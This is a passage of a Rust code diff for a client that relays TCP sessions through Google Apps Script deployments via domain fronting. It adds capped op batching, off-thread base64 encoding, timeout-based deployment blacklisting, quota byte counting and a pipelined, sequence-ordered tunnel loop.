+/// the data-bearing arms used to mutate in lockstep, with a single
+/// `push_or_fire` entry point so the cap-then-push pattern lives in one
+/// place instead of being copy-pasted into every arm.
+struct BatchAccum {
+    pending_ops: Vec<PendingOp>, // ops queued for the next `fire_batch`, not yet base64-encoded
+    data_replies: Vec<(usize, BatchedReply)>, // (index into `pending_ops`, reply channel) pairs
+    payload_bytes: usize, // running sum of the queued ops' `op_bytes`; zeroed after each fire
+}
+
+impl BatchAccum {
+    /// Creates an accumulator with no queued ops and a zero byte tally.
+    fn new() -> Self {
+        Self {
+            pending_ops: Vec::new(),
+            data_replies: Vec::new(),
+            payload_bytes: 0,
+        }
+    }
+
+    /// Queues `op` and its `reply` channel, charging `op_bytes` against the
+    /// batch. When `should_fire` reports that the op would overflow the
+    /// batch, the queued contents are handed to `fire_batch` first and the
+    /// op becomes the first entry of a fresh batch.
+    async fn push_or_fire(
+        &mut self,
+        op: PendingOp,
+        op_bytes: usize,
+        reply: BatchedReply,
+        sems: &Arc<HashMap<String, Arc<Semaphore>>>,
+        fronter: &Arc<DomainFronter>,
+    ) {
+        let over_cap = should_fire(self.pending_ops.len(), self.payload_bytes, op_bytes);
+        if over_cap {
+            // Hand the full batch off; `take` leaves empty vectors behind.
+            let ops = std::mem::take(&mut self.pending_ops);
+            let replies = std::mem::take(&mut self.data_replies);
+            fire_batch(sems, fronter, ops, replies).await;
+            self.payload_bytes = 0;
+        }
+        // The reply is keyed by the op's position within the current batch.
+        let slot = self.pending_ops.len();
+        self.pending_ops.push(op);
+        self.data_replies.push((slot, reply));
+        self.payload_bytes += op_bytes;
+    }
+}
+
+/// Decides whether the pending batch must be flushed before accepting one
+/// more op of `op_bytes` encoded bytes.
+///
+/// Returns `true` when the batch is non-empty and either it already holds
+/// `MAX_BATCH_OPS` ops or `payload_bytes + op_bytes` would exceed
+/// `MAX_BATCH_PAYLOAD_BYTES`. An empty batch (`pending_len == 0`) never
+/// fires, so a single op larger than the payload cap is still accepted.
+///
+/// The sum uses `saturating_add`, so an `op_bytes` near `usize::MAX`
+/// clamps to "fire" instead of wrapping around and slipping under the
+/// cap. Kept as a free function so the boundary can be unit-tested.
+fn should_fire(pending_len: usize, payload_bytes: usize, op_bytes: usize) -> bool {
+    // An empty batch never fires: the first op is always accepted.
+    if pending_len == 0 {
+        return false;
+    }
+    let ops_full = pending_len >= MAX_BATCH_OPS;
+    let bytes_over = payload_bytes.saturating_add(op_bytes) > MAX_BATCH_PAYLOAD_BYTES;
+    ops_full || bytes_over
+}
+
+/// Base64-encoded length of `n` raw bytes (standard padding):
+/// `ceil(n / 3) * 4`, saturating at `usize::MAX` instead of overflowing.
+/// `mux_loop` uses it to enforce `MAX_BATCH_PAYLOAD_BYTES` without encoding
+/// inline; the actual encoding happens in `fire_batch`'s spawned task.
+fn encoded_len(n: usize) -> usize {
+    n.div_ceil(3).saturating_mul(4)
+}
+
+/// Converts an internal `PendingOp` into the wire-shape `BatchOp`. Payload
+/// rule: non-empty data is base64-encoded; empty data becomes `Some("")`
+/// only when `encode_empty` is set; in every other case `d` is `None`.
+fn encode_pending(p: PendingOp) -> BatchOp {
+    let PendingOp { op, sid, host, port, data, encode_empty, seq, wseq } = p;
+    let d = match &data {
+        Some(bytes) if !bytes.is_empty() => Some(B64.encode(bytes)),
+        Some(_) if encode_empty => Some(String::new()),
+        _ => None,
+    };
+    BatchOp {
+        op: op.into(),
+        sid,
+        host,
+        port,
+        d,
+        seq,
+        wseq,
     }
 }
 
 /// Pick a deployment, acquire its per-account concurrency slot, and spawn
 /// a batch request task.
 ///
-/// The batch HTTP round-trip is bounded by `BATCH_TIMEOUT` so a slow or
-/// dead tunnel-node target cannot hold a pipeline slot (and block waiting
-/// sessions) forever.
+/// The batch HTTP round-trip is bounded by `DomainFronter::batch_timeout()`
+/// so a slow or dead tunnel-node target cannot hold a pipeline slot (and
+/// block waiting sessions) forever. Each batch makes a single attempt —
+/// no client-side retry against a different deployment, because
+/// tunnel-node's `drain_now` mutates the per-session buffer when building
+/// a response, so a lost response means lost bytes (silent gap on the
+/// client side). Without server-side ack / sequence support a replay
+/// would either duplicate writes (payload ops) or silently skip bytes
+/// (empty polls). Sessions whose batch times out re-poll on the next
+/// tick — same recovery surface as pre-#1088.
 async fn fire_batch(
     sems: &Arc<HashMap<String, Arc<Semaphore>>>,
     fronter: &Arc<DomainFronter>,
-    data_ops: Vec<BatchOp>,
-    data_replies: Vec<(usize, oneshot::Sender<Result<TunnelResponse, String>>)>,
+    pending_ops: Vec<PendingOp>,
+    data_replies: Vec<(usize, BatchedReply)>,
 ) {
     let script_id = fronter.next_script_id();
     let sem = sems
@@ -535,46 +1031,136 @@ async fn fire_batch(
         .cloned()
         .unwrap_or_else(|| Arc::new(Semaphore::new(CONCURRENCY_PER_DEPLOYMENT)));
     let permit = sem.acquire_owned().await.unwrap();
+    pipeline_debug::batch_acquire();
     let f = fronter.clone();
 
     tokio::spawn(async move {
+        struct BatchGuard;
+        impl Drop for BatchGuard { fn drop(&mut self) { pipeline_debug::batch_release(); } }
+        let _batch_guard = BatchGuard;
         let _permit = permit;
         let t0 = std::time::Instant::now();
-        let n_ops = data_ops.len();
-
-        // Bounded-wait: if the batch takes longer than BATCH_TIMEOUT,
-        // all sessions in this batch get an error and can retry.
+        let n_ops = pending_ops.len();
+
+        // Encode payloads to base64 here, off the single mux thread.
+        // With 50 ops × 64 KB this is up to ~3 MB of work; doing it on
+        // the mux task previously serialized every op behind whichever
+        // batch was currently encoding.
+        let data_ops: Vec<BatchOp> = pending_ops.into_iter().map(encode_pending).collect();
+
+        // Bounded-wait: if the batch takes longer than the configured
+        // batch timeout (Config::request_timeout_secs), all sessions in
+        // this batch get an error and can retry-poll on the next tick.
+        let batch_timeout = f.batch_timeout();
         let result = tokio::time::timeout(
-            BATCH_TIMEOUT,
+            batch_timeout,
             f.tunnel_batch_request_to(&script_id, &data_ops),
         )
         .await;
+        let sid_short = &script_id[..script_id.len().min(8)];
         tracing::info!(
             "batch: {} ops → {}, rtt={:?}",
             n_ops,
-            &script_id[..script_id.len().min(8)],
+            sid_short,
             t0.elapsed()
         );
 
         match result {
             Ok(Ok(batch_resp)) => {
+                f.record_batch_success(&script_id);
+                // Wire the Full-mode usage counter that #230 / #362 flagged
+                // as stuck-at-zero. Each successful batch is one
+                // `UrlFetchApp.fetch()` call against the deploying Google
+                // account's daily quota — bytes-counted is the inbound JSON
+                // response which is the closest analogue to the apps_script
+                // path's `record_today(bytes_received)` (we don't have the
+                // exact response byte count post-deserialize, so we use a
+                // proxy: sum of per-session response payload bytes the
+                // batch carried back). Underestimates by JSON envelope
+                // overhead but is in the right order of magnitude.
+                let response_bytes: u64 = batch_resp
+                    .r
+                    .iter()
+                    .map(|r| {
+                        // `d` carries TCP payload (base64 string len ≈
+                        // 4/3 of decoded bytes; close enough); `pkts`
+                        // carries UDP datagrams (each base64). Error
+                        // strings (`e`) are not counted. The sum is a
+                        // stable proxy for "how much did this batch move."
+                        let d = r.d.as_ref().map(|s| s.len() as u64).unwrap_or(0);
+                        let pkts = r
+                            .pkts
+                            .as_ref()
+                            .map(|v| v.iter().map(|p| p.len() as u64).sum::<u64>())
+                            .unwrap_or(0);
+                        d + pkts
+                    })
+                    .sum();
+                f.record_today(response_bytes);
                 for (idx, reply) in data_replies {
                     if let Some(resp) = batch_resp.r.get(idx) {
-                        let _ = reply.send(Ok(resp.clone()));
+                        let _ = reply.send(Ok((resp.clone(), script_id.clone())));
                     } else {
-                        let _ = reply.send(Err("missing response in batch".into()));
+                        tracing::error!(
+                            "batch response mismatch: idx={} but r.len()={} (sent {} ops) from script {}",
+                            idx, batch_resp.r.len(), n_ops, sid_short,
+                        );
+                        let _ = reply.send(Err(format!(
+                            "missing response in batch from script {}",
+                            sid_short
+                        )));
                     }
                 }
             }
             Ok(Err(e)) => {
+                // Read-side timeout from `domain_fronter`: Apps Script didn't
+                // start streaming response bytes within the per-read deadline.
+                // Common cause: deployment's `TUNNEL_SERVER_URL` points at a
+                // dead host, so UrlFetchApp inside Apps Script hangs until its
+                // own internal connect timeout. Strike-counter blacklists the
+                // deployment after a sustained pattern.
+                if matches!(e, FronterError::Timeout) {
+                    f.record_timeout_strike(&script_id);
+                }
                 let err_msg = format!("{}", e);
-                tracing::warn!("batch failed: {}", err_msg);
+                // Decoy / Apps-Script-flake detection. This body string can
+                // mean any of 4 unrelated things (AUTH_KEY mismatch, Apps
+                // Script execution timeout, Google-side flake, ISP-side
+                // truncation #313), so surface all candidates rather than
+                // asserting one. Operators can flip DIAGNOSTIC_MODE in
+                // Code.gs to disambiguate (#404).
+                if err_msg.contains("The script completed but did not return anything") {
+                    tracing::error!(
+                        "batch failed (script {}): got the v1.8.0 decoy/placeholder body — \
+                         could be (1) AUTH_KEY mismatch between mhrv-rs config and Code.gs \
+                         (run a direct curl probe against the deployment to verify), \
+                         (2) Apps Script execution timeout or per-100s quota tear (try \
+                         lowering parallel_concurrency in config), (3) Apps Script \
+                         internal hiccup (transient, retry next batch), or (4) ISP-side \
+                         response truncation (#313 pattern, try a different google_ip). \
+                         To distinguish (1) from the rest: set DIAGNOSTIC_MODE=true at \
+                         the top of Code.gs + redeploy as new version — only AUTH_KEY \
+                         mismatch returns this body in diagnostic mode.",
+                        sid_short
+                    );
+                } else {
+                    tracing::warn!("batch failed (script {}): {}", sid_short, err_msg);
+                }
                 for (_, reply) in data_replies {
                     let _ = reply.send(Err(err_msg.clone()));
                 }
             }
             Err(_) => {
-                tracing::warn!("batch timed out after {:?} ({} ops)", BATCH_TIMEOUT, n_ops);
+                // Whole-batch budget elapsed. Even stronger signal than a
+                // per-read timeout — count it the same way so a truly-stuck
+                // deployment exits round-robin fast.
+                f.record_timeout_strike(&script_id);
+                tracing::warn!(
+                    "batch timed out after {:?} (script {}, {} ops)",
+                    batch_timeout,
+                    sid_short,
+                    n_ops
+                );
                 for (_, reply) in data_replies {
                     let _ = reply.send(Err("batch timed out".into()));
                 }
@@ -606,14 +1192,13 @@ pub async fn tunnel_connection(
         mux.record_preread_skip_port(port);
         None
     } else {
-        let mut buf = vec![0u8; 65536];
+        let mut buf = BytesMut::with_capacity(65536);
         let t0 = Instant::now();
-        match tokio::time::timeout(CLIENT_FIRST_DATA_WAIT, sock.read(&mut buf)).await {
+        match tokio::time::timeout(CLIENT_FIRST_DATA_WAIT, sock.read_buf(&mut buf)).await {
             Ok(Ok(0)) => return Ok(()),
-            Ok(Ok(n)) => {
+            Ok(Ok(_)) => {
                 mux.record_preread_win(port, t0.elapsed());
-                buf.truncate(n);
-                Some(Arc::new(buf))
+                Some(buf.freeze())
             }
             Ok(Err(e)) => return Err(e),
             Err(_) => {
@@ -629,20 +1214,17 @@ pub async fn tunnel_connection(
             ConnectDataOutcome::Unsupported => {
                 mux.mark_connect_data_unsupported();
                 let sid = connect_plain(host, port, mux).await?;
-                // Recover the buffered ClientHello from the Arc so the
-                // first tunnel_loop iteration can replay it. The mux task
-                // may still hold the other ref during the unsupported
-                // reply's settle window — fall back to a clone in that
-                // race (rare; the reply path drops its ref before we
-                // reach here in practice).
-                let bytes = Arc::try_unwrap(data).unwrap_or_else(|a| (*a).clone());
-                (sid, None, Some(bytes))
+                // Replay the buffered ClientHello on the first tunnel_loop
+                // iteration. `Bytes::clone()` is a cheap Arc bump — no
+                // copy of the 64 KB buffer.
+                (sid, None, Some(data))
             }
         },
         None => (connect_plain(host, port, mux).await?, None, None),
     };
 
     tracing::info!("tunnel session {} opened for {}:{}", sid, host, port);
+    pipeline_debug::session_start(&sid);
 
     // Run the first-response write + tunnel_loop inside an async block so
     // any io-error propagates via `?` without bypassing the Close below.
@@ -672,6 +1254,7 @@ pub async fn tunnel_connection(
     .await;
 
     mux.send(MuxMsg::Close { sid: sid.clone() }).await;
+    pipeline_debug::session_end(&sid);
     tracing::info!("tunnel session {} closed for {}:{}", sid, host, port);
     result
 }
@@ -697,6 +1280,11 @@ async fn connect_plain(host: &str, port: u16, mux: &Arc<TunnelMux>) -> std::io::
         Ok(Ok(resp)) => {
             if let Some(ref e) = resp.e {
                 tracing::error!("tunnel connect error for {}:{}: {}", host, port, e);
+                // Only cache here: `resp.e` is the tunnel-node's own connect()
+                // result against the target. The outer `Ok(Err(_))` arm below
+                // is a transport-level failure (relay → Apps Script → tunnel-
+                // node never reached) and tells us nothing about the target.
+                mux.record_unreachable_if_match(host, port, e);
                 return Err(std::io::Error::new(
                     std::io::ErrorKind::ConnectionRefused,
                     e.clone(),
@@ -723,7 +1311,7 @@ async fn connect_plain(host: &str, port: u16, mux: &Arc<TunnelMux>) -> std::io::
 async fn connect_with_initial_data(
     host: &str,
     port: u16,
-    data: Arc<Vec<u8>>,
+    data: Bytes,
     mux: &Arc<TunnelMux>,
 ) -> std::io::Result<ConnectDataOutcome> {
     let (reply_tx, reply_rx) = oneshot::channel();
@@ -736,13 +1324,16 @@ async fn connect_with_initial_data(
     .await;
 
     let resp = match reply_rx.await {
-        Ok(Ok(resp)) => resp,
+        Ok(Ok((resp, _script_id))) => resp,
         Ok(Err(e)) => {
             if is_connect_data_unsupported_error_str(&e) {
                 tracing::debug!("connect_data unsupported for {}:{}: {}", host, port, e);
                 return Ok(ConnectDataOutcome::Unsupported);
             }
             tracing::error!("tunnel connect_data error for {}:{}: {}", host, port, e);
+            // Outer transport failure (relay/Apps Script never reached the
+            // tunnel-node). Don't poison the destination cache from here —
+            // see `connect_plain` for the same reasoning.
             return Err(std::io::Error::new(
                 std::io::ErrorKind::ConnectionRefused,
                 e,
@@ -768,6 +1359,8 @@ async fn connect_with_initial_data(
 
     if let Some(ref e) = resp.e {
         tracing::error!("tunnel connect_data error for {}:{}: {}", host, port, e);
+        // `resp.e` is the tunnel-node's own connect result — cache it.
+        mux.record_unreachable_if_match(host, port, e);
         return Err(std::io::Error::new(
             std::io::ErrorKind::ConnectionRefused,
             e.clone(),
@@ -819,132 +1412,479 @@ fn is_connect_data_unsupported_error_str(e: &str) -> bool {
     (e.contains("unknown op") || e.contains("unknown tunnel op")) && e.contains("connect_data")
 }
 
+/// Metadata for one in-flight Data op, returned alongside its reply so
+/// `tunnel_loop` can order writes and log round-trip time.
+struct InflightMeta {
+    seq: u64, // per-session send sequence; replies are written in this order
+    was_empty_poll: bool, // true for empty polls, false for ops carrying upload data
+    send_at: Instant, // captured just before the op is handed to the mux
+}
+
 async fn tunnel_loop(
     sock: &mut TcpStream,
     sid: &str,
     mux: &Arc<TunnelMux>,
-    mut pending_client_data: Option<Vec<u8>>,
+    pending_client_data: Option<Bytes>,
 ) -> std::io::Result<()> {
     let (mut reader, mut writer) = sock.split();
-    let mut buf = vec![0u8; 65536];
-    let mut consecutive_empty = 0u32;
 
-    loop {
-        // Cadence depends on whether the tunnel-node is doing long-poll
-        // drains. With long-poll, the server holds empty polls open up
-        // to its `LONGPOLL_DEADLINE` (~5 s currently), so the client
-        // can keep this read timeout short — the wait is on the wire,
-        // not here. Against a *legacy* tunnel-node (no long-poll, fast
-        // empty replies), the same short cadence + always-poll behavior
-        // would generate continuous round-trips on idle sessions and
-        // burn Apps Script quota. The `server_no_longpoll` flag detects
-        // the legacy case from reply latency below and reverts to the
-        // pre-long-poll cadence: long sleep on local read, skip empty
-        // polls when sustained-idle.
-        let legacy_mode = mux.server_no_longpoll();
-        let client_data = if let Some(data) = pending_client_data.take() {
-            Some(data)
-        } else {
-            let read_timeout = match (legacy_mode, consecutive_empty) {
-                (_, 0) => Duration::from_millis(20),
-                (_, 1) => Duration::from_millis(80),
-                (_, 2) => Duration::from_millis(200),
-                (false, _) => Duration::from_millis(500),
-                (true, _) => Duration::from_secs(30),
-            };
-
-            match tokio::time::timeout(read_timeout, reader.read(&mut buf)).await {
-                Ok(Ok(0)) => break,
-                Ok(Ok(n)) => {
-                    consecutive_empty = 0;
-                    Some(buf[..n].to_vec())
-                }
-                Ok(Err(_)) => break,
-                Err(_) => None,
+    let inflight_cap = INFLIGHT_ACTIVE;
+    let mut max_inflight = INFLIGHT_OPTIMIST.min(inflight_cap);
+    let mut consecutive_empty = 0u32;
+    let mut consecutive_data: u32 = 0;
+    let mut is_elevated = false;
+    let mut total_download_bytes: u64 = 0;
+    let mut next_send_seq: u64 = 0;
+    let mut next_write_seq: u64 = 0;
+    let mut next_data_write_seq: u64 = 0;
+    let mut eof_seen = false;
+    let mut client_closed = false;
+    let mut pending_writes: BTreeMap<u64, (TunnelResponse, String)> = BTreeMap::new();
+
+    // Buffered upload data waiting to be sent (when pipeline is full).
+    let mut buffered_upload: Option<Bytes> = None;
+
+    enum ReplyOutcome {
+        Ok(TunnelResponse, String),
+        BatchErr(String),
+        Timeout,
+        Dropped,
+    }
+    type ReplyFut =
+        std::pin::Pin<Box<dyn std::future::Future<Output = (InflightMeta, ReplyOutcome)> + Send>>;
+    let mut inflight: FuturesUnordered<ReplyFut> = FuturesUnordered::new();
+
+    // Helper: wrap a reply_rx into a ReplyFut with timeout.
+    fn wrap_reply(
+        meta: InflightMeta,
+        reply_rx: oneshot::Receiver<Result<(TunnelResponse, String), String>>,
+    ) -> std::pin::Pin<Box<dyn std::future::Future<Output = (InflightMeta, ReplyOutcome)> + Send>> {
+        Box::pin(async move {
+            match tokio::time::timeout(REPLY_TIMEOUT, reply_rx).await {
+                Ok(Ok(Ok((r, sid)))) => (meta, ReplyOutcome::Ok(r, sid)),
+                Ok(Ok(Err(e))) => (meta, ReplyOutcome::BatchErr(e)),
+                Ok(Err(_)) => (meta, ReplyOutcome::Dropped),
+                Err(_) => (meta, ReplyOutcome::Timeout),
             }
-        };
-
-        // Legacy-server skip: against a non-long-polling tunnel-node,
-        // an empty poll is wasted work — fast-empty reply, no push
-        // delivery benefit. Preserve the pre-long-poll behavior of
-        // going quiet after a few empties. Long-poll-capable servers
-        // skip this branch and always send the empty op so the server
-        // can hold it open.
-        if legacy_mode && client_data.is_none() && consecutive_empty > 3 {
-            continue;
-        }
+        })
+    }
 
-        let data = client_data.unwrap_or_default();
-        let was_empty_poll = data.is_empty();
+    /// Send an empty poll Data op. Returns the InflightMeta and reply rx.
+    #[inline]
+    fn send_empty_poll(
+        sid: &str,
+        next_send_seq: &mut u64,
+        mux: &Arc<TunnelMux>,
+    ) -> (
+        InflightMeta,
+        oneshot::Receiver<Result<(TunnelResponse, String), String>>,
+    ) {
+        let seq = *next_send_seq;
+        *next_send_seq += 1;
+        let (reply_tx, reply_rx) = oneshot::channel();
+        let send_at = Instant::now();
+        mux.send_sync(MuxMsg::Data {
+            sid: sid.to_string(),
+            data: Bytes::new(),
+            seq: Some(seq),
+            wseq: None,
+            reply: reply_tx,
+        });
+        let meta = InflightMeta { seq, was_empty_poll: true, send_at };
+        (meta, reply_rx)
+    }
 
+    /// Send a data op with wseq. Returns the InflightMeta and reply rx.
+    #[inline]
+    fn send_data_op(
+        sid: &str,
+        data: Bytes,
+        next_send_seq: &mut u64,
+        next_data_write_seq: &mut u64,
+        mux: &Arc<TunnelMux>,
+    ) -> (
+        InflightMeta,
+        oneshot::Receiver<Result<(TunnelResponse, String), String>>,
+    ) {
+        let seq = *next_send_seq;
+        *next_send_seq += 1;
+        let wseq = *next_data_write_seq;
+        *next_data_write_seq += 1;
         let (reply_tx, reply_rx) = oneshot::channel();
         let send_at = Instant::now();
-        mux.send(MuxMsg::Data {
+        let sid_short = &sid[..sid.len().min(8)];
+        tracing::info!(
+            "sess {}: upload send seq={} wseq={} len={}B",
+            sid_short, seq, wseq, data.len(),
+        );
+        mux.send_sync(MuxMsg::Data {
             sid: sid.to_string(),
             data,
+            seq: Some(seq),
+            wseq: Some(wseq),
             reply: reply_tx,
-        })
-        .await;
+        });
+        let meta = InflightMeta { seq, was_empty_poll: false, send_at };
+        (meta, reply_rx)
+    }
 
-        // Bounded-wait on reply: if the batch this op landed in is slow
-        // (dead target on the tunnel-node side), don't block this session
-        // forever — timeout and let it retry on the next tick.
-        let resp = match tokio::time::timeout(REPLY_TIMEOUT, reply_rx).await {
-            Ok(Ok(Ok(r))) => r,
-            Ok(Ok(Err(e))) => {
-                tracing::debug!("tunnel data error: {}", e);
-                break;
-            }
-            Ok(Err(_)) => break, // channel dropped
-            Err(_) => {
-                tracing::warn!("sess {}: reply timeout, retrying", &sid[..sid.len().min(8)]);
-                consecutive_empty = consecutive_empty.saturating_add(1);
-                continue;
-            }
-        };
+    // ── Initial path: send pending client data or read from client ──
+    if let Some(data) = pending_client_data {
+        if !data.is_empty() {
+            let (meta, reply_rx) = send_data_op(sid, data, &mut next_send_seq, &mut next_data_write_seq, mux);
+            tracing::debug!(
+                "sess {}: pending data seq={}",
+                &sid[..sid.len().min(8)],
+                meta.seq,
+            );
+            inflight.push(wrap_reply(meta, reply_rx));
+        }
+    }
 
-        // Legacy-server detection: an empty-in/empty-out round trip
-        // that finishes well under `LEGACY_DETECT_THRESHOLD` is
-        // structurally impossible on a long-poll-capable tunnel-node
-        // (the server holds the response either until data arrives or
-        // until its long-poll deadline). One observation flips the
-        // sticky flag for the rest of this process. Skip the check
-        // once already in legacy mode — the comparison is cheap, but
-        // calling `mark_server_no_longpoll` repeatedly muddies logs.
-        if !legacy_mode && was_empty_poll {
-            let reply_was_empty = resp.d.as_deref().map(str::is_empty).unwrap_or(true);
-            if reply_was_empty && send_at.elapsed() < LEGACY_DETECT_THRESHOLD {
-                mux.mark_server_no_longpoll();
+    // Send initial pre-fill empty polls (optimist depth), staggered
+    // 1s apart so they land in separate batches. The pending data op
+    // (if any) already occupies one slot.
+    {
+        let polls_to_send = max_inflight.saturating_sub(inflight.len());
+        for i in 0..polls_to_send {
+            if i > 0 {
+                tokio::time::sleep(Duration::from_secs(1)).await;
             }
+            let (meta, reply_rx) = send_empty_poll(sid, &mut next_send_seq, mux);
+            tracing::debug!(
+                "sess {}: prefill poll seq={}, inflight={}",
+                &sid[..sid.len().min(8)],
+                meta.seq,
+                inflight.len() + 1,
+            );
+            inflight.push(wrap_reply(meta, reply_rx));
+        }
+    }
+
+    // Timer for staggered refill polls — fires in the select, never blocks.
+    let mut refill_at: Option<std::pin::Pin<Box<tokio::time::Sleep>>> = None;
+    let mut refill_steps: u32 = 0;
+
+    // Schedule initial refill if pre-fill didn't fill all slots.
+    if inflight.len() < max_inflight {
+        refill_at = Some(Box::pin(tokio::time::sleep(Duration::from_millis(100))));
+        refill_steps = 0;
+    }
+
+    // Read buffer for client socket.
+    let mut read_buf = BytesMut::with_capacity(65536);
+
+    // Main select loop — handles both upload reads and download replies.
+    loop {
+        // If nothing in flight and tunnel EOF, we're done.
+        if inflight.is_empty() && eof_seen {
+            break;
         }
 
-        if let Some(ref e) = resp.e {
-            tracing::debug!("tunnel error: {}", e);
+        // If nothing in flight and client closed, we're done.
+        if inflight.is_empty() && client_closed {
             break;
         }
 
-        let got_data = match write_tunnel_response(&mut writer, &resp).await? {
-            WriteOutcome::Wrote => true,
-            WriteOutcome::NoData => false,
-            WriteOutcome::BadBase64 => {
-                // Tunnel-node gave us garbage; tear the session down but
-                // do NOT propagate as an io error — the caller's Close
-                // guard will clean up on the tunnel-node side.
-                break;
+        // If eof was seen but inflight is not empty, give remaining
+        // replies a short grace period to deliver any buffered data
+        // before the remote connection closed. After 500ms, abandon them.
+        if eof_seen && !inflight.is_empty() {
+            match tokio::time::timeout(Duration::from_millis(500), inflight.next()).await {
+                Ok(Some((meta, ReplyOutcome::Ok(resp, script_id)))) => {
+                    if meta.seq == next_write_seq {
+                        let _ = write_tunnel_response(&mut writer, &resp).await;
+                        next_write_seq += 1;
+                        while let Some(entry) = pending_writes.first_entry() {
+                            if *entry.key() != next_write_seq { break; }
+                            let (_, (buffered_resp, _)) = entry.remove_entry();
+                            let _ = write_tunnel_response(&mut writer, &buffered_resp).await;
+                            next_write_seq += 1;
+                        }
+                    } else {
+                        pending_writes.insert(meta.seq, (resp, script_id));
+                    }
+                    continue;
+                }
+                _ => break,
             }
-        };
+        }
 
-        if resp.eof.unwrap_or(false) {
-            break;
+        // When inflight is empty and we haven't seen eof, read from
+        // client or send an empty poll to keep the session alive.
+        if inflight.is_empty() && !eof_seen {
+            let all_legacy = mux.all_servers_legacy();
+
+            // If all servers are legacy and we've had many consecutive
+            // empties, wait for client data before sending.
+            if all_legacy && consecutive_empty > 3 && !client_closed {
+                read_buf.reserve(65536);
+                match reader.read_buf(&mut read_buf).await {
+                    Ok(0) => break,
+                    Ok(n) => {
+                        consecutive_empty = 0;
+                        let data = extract_bytes(&mut read_buf, n);
+                        let (meta, reply_rx) = send_data_op(sid, data, &mut next_send_seq, &mut next_data_write_seq, mux);
+                        inflight.push(wrap_reply(meta, reply_rx));
+                        continue;
+                    }
+                    Err(_) => break,
+                }
+            }
+
+            let (meta, reply_rx) = send_empty_poll(sid, &mut next_send_seq, mux);
+            tracing::debug!(
+                "sess {}: keepalive poll seq={}", &sid[..sid.len().min(8)], meta.seq
+            );
+            inflight.push(wrap_reply(meta, reply_rx));
         }
 
-        if got_data {
-            consecutive_empty = 0;
-        } else {
-            consecutive_empty = consecutive_empty.saturating_add(1);
+        // Can we read from the client? Yes if not closed, not eof, and
+        // we have room for more inflight ops (fast-path allows +4 extra).
+        let can_read = !client_closed && !eof_seen && inflight.len() < max_inflight + 4;
+
+        tokio::select! {
+            biased;
+
+            // Refill timer: 100ms steps, send empty poll after 10 steps
+            // (1s) for batch separation.
+            _ = async { refill_at.as_mut().unwrap().await }, if refill_at.is_some() => {
+                refill_at = None;
+                if !eof_seen && inflight.len() < max_inflight {
+                    refill_steps += 1;
+
+                    if refill_steps >= 10 {
+                        // Check buffered upload first — merge into a data
+                        // op instead of sending an empty poll.
+                        if let Some(data) = buffered_upload.take() {
+                            let (meta, reply_rx) = send_data_op(sid, data, &mut next_send_seq, &mut next_data_write_seq, mux);
+                            inflight.push(wrap_reply(meta, reply_rx));
+                        } else {
+                            let (meta, reply_rx) = send_empty_poll(sid, &mut next_send_seq, mux);
+                            inflight.push(wrap_reply(meta, reply_rx));
+                        }
+                        refill_steps = 0;
+
+                        if inflight.len() < max_inflight && max_inflight > INFLIGHT_IDLE {
+                            refill_at = Some(Box::pin(tokio::time::sleep(Duration::from_millis(100))));
+                        }
+                    } else {
+                        refill_at = Some(Box::pin(tokio::time::sleep(Duration::from_millis(100))));
+                    }
+                }
+            }
+
+            // Process completed replies.
+            Some((meta, outcome)) = inflight.next() => {
+                match outcome {
+                    ReplyOutcome::Ok(resp, script_id) => {
+                        let has_data = resp.d.as_ref().map(|d| !d.is_empty()).unwrap_or(false);
+                        tracing::debug!(
+                            "sess {}: recv seq={}, rtt={:?}, data={}, inflight={}",
+                            &sid[..sid.len().min(8)],
+                            meta.seq,
+                            meta.send_at.elapsed(),
+                            has_data,
+                            inflight.len(),
+                        );
+                        if resp.seq.is_none() {
+                            max_inflight = 1;
+                        }
+
+                        if let Some(ref e) = resp.e {
+                            tracing::debug!("tunnel error: {}", e);
+                            break;
+                        }
+
+                        let is_eof = resp.eof.unwrap_or(false);
+                        let resp_has_seq = resp.seq.is_some();
+
+                        // Write in-order to client.
+                        if meta.seq == next_write_seq {
+                            let got_data = match write_tunnel_response(&mut writer, &resp).await? {
+                                WriteOutcome::Wrote => true,
+                                WriteOutcome::NoData => false,
+                                WriteOutcome::BadBase64 => break,
+                            };
+                            next_write_seq += 1;
+                            if got_data {
+                                consecutive_empty = 0;
+                                consecutive_data = consecutive_data.saturating_add(1);
+                                let bytes = resp.d.as_ref().map(|d| d.len() as u64 * 3 / 4).unwrap_or(0);
+                                total_download_bytes += bytes;
+                            } else {
+                                consecutive_empty = consecutive_empty.saturating_add(1);
+                            }
+                            if is_eof {
+                                eof_seen = true;
+                            }
+
+                            // Flush buffered out-of-order writes.
+                            while let Some(entry) = pending_writes.first_entry() {
+                                if *entry.key() != next_write_seq { break; }
+                                let (_, (buffered_resp, _)) = entry.remove_entry();
+                                let buf_eof = buffered_resp.eof.unwrap_or(false);
+                                match write_tunnel_response(&mut writer, &buffered_resp).await? {
+                                    WriteOutcome::Wrote => {
+                                        consecutive_empty = 0;
+                                        consecutive_data = consecutive_data.saturating_add(1);
+                                        let bytes = buffered_resp.d.as_ref().map(|d| d.len() as u64 * 3 / 4).unwrap_or(0);
+                                        total_download_bytes += bytes;
+                                    }
+                                    WriteOutcome::NoData => {
+                                        consecutive_empty = consecutive_empty.saturating_add(1);
+                                    }
+                                    WriteOutcome::BadBase64 => break,
+                                }
+                                next_write_seq += 1;
+                                if buf_eof {
+                                    eof_seen = true;
+                                }
+                            }
+                        } else {
+                            pending_writes.insert(meta.seq, (resp, script_id));
+                        }
+
+                        // Send buffered upload data now that a slot freed up.
+                        if let Some(data) = buffered_upload.take() {
+                            if inflight.len() < max_inflight {
+                                let (meta, reply_rx) = send_data_op(sid, data, &mut next_send_seq, &mut next_data_write_seq, mux);
+                                consecutive_empty = 0;
+                                inflight.push(wrap_reply(meta, reply_rx));
+                            } else {
+                                buffered_upload = Some(data);
+                            }
+                        }
+
+                        // Adaptive pipeline depth management.
+                        tracing::info!(
+                            "sess {}: depth={} cd={} ce={} inf={} has_seq={}",
+                            &sid[..sid.len().min(8)],
+                            max_inflight, consecutive_data, consecutive_empty, inflight.len(), resp_has_seq,
+                        );
+                        if resp_has_seq {
+                            let prev = max_inflight;
+                            if consecutive_empty >= 2 && max_inflight > INFLIGHT_IDLE {
+                                max_inflight = INFLIGHT_IDLE.min(inflight_cap);
+                                if is_elevated {
+                                    let n = mux.elevated_sessions.fetch_sub(1, Ordering::Relaxed);
+                                    pipeline_debug::set_elevated(n.saturating_sub(1));
+                                    is_elevated = false;
+                                }
+                            } else if consecutive_data >= 1 && max_inflight < INFLIGHT_OPTIMIST {
